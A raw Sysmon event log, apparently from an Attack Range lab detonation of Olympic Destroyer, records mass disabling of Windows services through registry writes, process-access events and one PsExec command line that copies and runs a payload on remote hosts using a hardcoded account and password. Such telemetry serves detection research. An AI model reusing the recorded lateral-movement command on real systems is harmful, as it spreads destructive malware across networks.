13241300x8000000000000000290584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas2i\StartDWORD (0x00000004) 13241300x8000000000000000290583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas\ImagePath\SystemRoot\System32\drivers\megasas.sys 12241200x8000000000000000290582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas\StartOverride 13241300x8000000000000000290581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.882{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\megasas\StartDWORD (0x00000004) 13241300x8000000000000000290580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MapsBroker\StartDWORD (0x00000004) 13241300x8000000000000000290579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\luafv\StartDWORD (0x00000004) 13241300x8000000000000000290578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SSS\ImagePath\SystemRoot\System32\drivers\lsi_sss.sys 12241200x8000000000000000290577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SSS\StartOverride 13241300x8000000000000000290576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SSS\StartDWORD (0x00000004) 13241300x8000000000000000290575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS3i\ImagePath\SystemRoot\System32\drivers\lsi_sas3i.sys 12241200x8000000000000000290574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS3i\StartOverride 13241300x8000000000000000290573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS3i\StartDWORD (0x00000004) 13241300x8000000000000000290572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS2i\ImagePath\SystemRoot\System32\drivers\lsi_sas2i.sys 12241200x8000000000000000290571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS2i\StartOverride 13241300x8000000000000000290570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS2i\StartDWORD (0x00000004) 13241300x8000000000000000290569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS\ImagePath\SystemRoot\System32\drivers\lsi_sas.sys 12241200x8000000000000000290568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS\StartOverride 13241300x8000000000000000290567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LSI_SAS\StartDWORD (0x00000004) 13241300x8000000000000000290566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\lmhosts\StartDWORD (0x00000004) 13241300x8000000000000000290565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\lltdsvc\StartDWORD (0x00000004) 13241300x8000000000000000290564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\lltdio\StartDWORD (0x00000004) 13241300x8000000000000000290563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LicenseManager\StartDWORD (0x00000004) 13241300x8000000000000000290562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\lfsvc\StartDWORD (0x00000004) 13241300x8000000000000000290561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanWorkstation\StartDWORD (0x00000004) 13241300x8000000000000000290560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\StartDWORD (0x00000004) 10341000x8000000000000000290559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.866{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KtmRm\StartDWORD (0x00000004) 10341000x8000000000000000290556Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290555Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.866{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290554Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ksthunk\StartDWORD (0x00000004) 13241300x8000000000000000290553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KSecPkg\ImagePath\SystemRoot\System32\Drivers\ksecpkg.sys 13241300x8000000000000000290552Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.866{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KSecPkg\StartDWORD (0x00000004) 13241300x8000000000000000290551Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.865{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KSecDD\ImagePath\SystemRoot\System32\Drivers\ksecdd.sys 13241300x8000000000000000290550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.865{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KSecDD\StartDWORD (0x00000004) 13241300x8000000000000000290549Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.864{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KPSSVC\StartDWORD (0x00000004) 13241300x8000000000000000290548Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.863{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KeyIso\StartDWORD (0x00000004) 13241300x8000000000000000290547Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.861{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KdsSvc\StartDWORD (0x00000004) 13241300x8000000000000000290546Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\kdnic\StartDWORD (0x00000004) 13241300x8000000000000000290545Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Kdc\StartDWORD (0x00000004) 13241300x8000000000000000290544Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\kbdhid\StartDWORD (0x00000004) 13241300x8000000000000000290543Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\kbdclass\StartDWORD (0x00000004) 13241300x8000000000000000290542Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IsmServ\StartDWORD (0x00000004) 10341000x8000000000000000290541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.845{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000290540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iScsiPrt\StartDWORD (0x00000004) 13241300x8000000000000000290539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\isapnp\ImagePath\SystemRoot\System32\drivers\isapnp.sys 12241200x8000000000000000290538Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\isapnp\StartOverride 13241300x8000000000000000290537Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\isapnp\StartDWORD (0x00000004) 13241300x8000000000000000290536Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IPsecGW\StartDWORD (0x00000004) 13241300x8000000000000000290535Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IPNAT\StartDWORD (0x00000004) 13241300x8000000000000000290534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IPMIDRV\StartDWORD (0x00000004) 13241300x8000000000000000290533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.845{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iphlpsvc\StartDWORD (0x00000004) 10341000x8000000000000000290532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.845{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.845{C8EA50B7-12E6-6216-4B05-000000003802}67926872C:\Temp\olympic_destroyer.exe{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.847{C8EA50B7-12EA-6216-6805-000000003802}516C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 13241300x8000000000000000290529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IpFilterDriver\StartDWORD (0x00000004) 13241300x8000000000000000290528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelppm\StartDWORD (0x00000004) 534500x8000000000000000290527Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 13241300x8000000000000000290526Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelpep\ImagePath\SystemRoot\System32\drivers\intelpep.sys 13241300x8000000000000000290525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelpep\StartDWORD (0x00000004) 13241300x8000000000000000290524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelide\ImagePath\SystemRoot\System32\drivers\intelide.sys 12241200x8000000000000000290523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelide\StartOverride 13241300x8000000000000000290522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\intelide\StartDWORD (0x00000004) 13241300x8000000000000000290521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IndirectKmd\StartDWORD (0x00000004) 10341000x8000000000000000290520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6705-000000003802}6112C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6705-000000003802}6112C:\Windows\system32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a731|c:\windows\system32\UBPM.dll+f954|c:\windows\system32\UBPM.dll+cd5c|c:\windows\system32\UBPM.dll+d325|c:\windows\system32\UBPM.dll+dc25|c:\windows\system32\UBPM.dll+e8fd|c:\windows\system32\UBPM.dll+e14a|c:\windows\system32\UBPM.dll+dda2|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IKEEXT\StartDWORD (0x00000004) 13241300x8000000000000000290517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\icssvc\StartDWORD (0x00000004) 13241300x8000000000000000290516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ibbus\StartDWORD (0x00000004) 13241300x8000000000000000290515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 